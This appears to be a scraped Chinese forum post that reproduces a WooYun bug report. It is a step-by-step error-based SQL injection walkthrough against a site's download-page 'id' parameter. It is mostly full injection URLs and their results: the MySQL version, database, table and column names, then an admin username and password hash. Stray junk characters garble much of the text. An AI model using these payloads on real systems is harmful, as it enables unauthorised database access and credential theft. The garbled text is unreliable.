http://www.wooyun.org/bugs/wooyun-2010-01666$ ?% ~. c9 ]+ D8 ^4 J8 S
! s* N! \' t4 d7 W, B, P! w) \" N
之前想找个测试 没想到这有 可以测试下做个记录而已
. D1 U- B0 a7 ~( v" Q2 k/ f
* m& l* l) F6 N, _6 Ghttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_0034 Q# h- t" Q$ g1 K; B4 X. N
3 E' F* i: K- E0 r! v/data0/htdocs/leqi_new/app/myapp.php0 h! u+ u4 c5 M4 j+ A& [. b
% Z; ^( ]- f; x# U% E 或者
: e2 \6 C& V8 @( Q s. P
1 t0 t* ]/ Q$ Q5 b/**********version()**********/ 5.1.49-log
0 d' R0 U6 `* L. d0 j6 ?http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/ V& H0 C) Y% q* m; b
# D* e4 w2 k& p/ [; _/**********user()**********/
- |3 W- a! e; x+ @http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
. }; i* l, k1 K }9 j, s1 ?
2 x& k" Q" m6 w3 z% q5 _; h2 Z: e/**********database()**********/ leqi+ [3 _: ]" f3 Z, a: Q4 o/ ~
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
+ U0 r( R2 q6 q- A. P6 s% |5 V4 ?# i; b/ y# d
/**********limit依次递归爆库**********/
7 j X; z& F! ^( H2 k( O1 y- _http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0032 k6 u: f4 x5 T2 B* n8 h H
information_schema
3 I0 j, n5 Z2 Fhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
! Q) W& ^. n5 \8 U# K7 U9 ^1 C6 Xleqi
0 u* ~* d+ p2 V/ z8 H4 z; @http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003" C. V( h# }1 j& Y& A4 J" A) P* l
test
4 r1 { Q& Y1 c( a. Q' m4 M f( f! e* o
5 C: Y7 C4 B" p! g. V/**********limit依次递归爆表名**********/: b( X1 M: G9 P: F! H7 g# ~( b# t
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0036 Q, r; _2 A- r7 _7 V- X9 `
users
5 Y9 Z0 x# P- D) O# X5 U+ w& R3 X" x/ k4 m1 ?
/**********limit依次递归爆字段名**********/& ?, g; d z- r6 z% x
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
" u0 P- k2 v( j& g' xuser_id,username,nickname,passwd,group_id! q" M9 [+ D; H# A Y( S
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23. f$ R+ p2 X* S0 E) Z
/wapc/5000_0005_0035 d; j) w- ^/ s4 X* ]" @2 G1 Q
11 213 `! R1 ]/ ?+ V1 H7 r% t# l) M
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/ g8 \! l% M# ~: N8 r
/wapc/5000_0005_003
1 h" {1 V8 F/ J# M2 i11 341 351 361- l" l& H* R- M* a5 l$ }; w$ o7 O
/**********爆数据**********/* C& m: V6 V3 C. |" E
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
& F! L3 D% \- w2 C2 Y- l9 j. x Dadmin a6 r2 T* ` ^3 S9 @ ~! J; U1 A
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
' G" k) B5 l/ d- h) H3 v) A' H2 p6a8b4574ca231eb8bd52764d4978ffcd4 d; c# v* Y! a0 l3 R& ]
* E! u9 I. z8 k6 B1 h' X% k7 F 2 ^+ F7 \5 A+ @
|